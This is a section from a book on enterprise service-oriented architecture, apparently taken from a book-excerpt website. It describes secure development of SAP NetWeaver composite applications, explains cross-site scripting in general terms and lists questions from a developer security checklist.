Section 19.7. How do you develop secure composite applications without weaknesses?

Previous page
Table of content
Next page

19.7. How do you develop secure composite applications without weaknesses?

The first step will be to develop security-friendly patterns of development, a set of frameworks for creating composite applications with inherently secure components. SAP will do its part by linking future versions of modeling tools such as SAP NetWeaver Visual Composer to the security operations layer of enterprise services, enabling enterprise architects to combine services in various combinations without explicitly focusing on security issues.

But developers will need additional frameworks and special security training to guide them in designing applications which will deflect common attacks such as cross-site scripting, in which malicious JavaScript code is entered into a web form, and while the code won't harm the host machine, it will load and infect the next unwitting customer who attempts to access your form. Learning to thwart these attacks isn't so much of an ESA issue as it is a development-of-best-practices issue, but these issues will become much more tangible when critical processes begin to poke their heads out beyond the corporate firewall.

SAP NetWeaver already includes frameworks to support secure programming. In addition, the SAP NetWeaver Developer's Guide includes a multiple-page security checklist for developers finishing their applications. The checklist leads off with questions such as:

  • Is no security-relevant data stored on the client?

  • Is the application free of back doors?

  • Do all security implementations consist of a consistent and documented concept (and not "security by obscurity")?

  • Does the system pass into a safe state in case of errors?

  • Is the data stored in a secure way beyond the application session?

  • Are no static keys used when encrypting data?

  • Are encrypted data and keys always stored separately from each other, and can an attacker not implicate them?

Additional resources include the Secure Programming section on the SAP Developer Network (SDN; http://sdn.sap.com).



Previous page
Table of content
Next page
Enterprise SOA. Designing IT for Business Innovation
Enterprise SOA: Designing IT for Business Innovation
ISBN: 0596102380
EAN: 2147483647
Year: 2004
Pages: 265
Authors: Dan Woods, Thomas Mattern
BUY ON AMAZON
MySQL Stored Procedure Programming
Identifying and Managing Project Risk: Essential Tools for Failure-Proofing Your Project
Image Processing with LabVIEW and IMAQ Vision
Building Web Applications with UML (2nd Edition)
Managing Enterprise Systems with the Windows Script Host
Professional Struts Applications: Building Web Sites with Struts ObjectRelational Bridge, Lucene, and Velocity (Experts Voice)
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy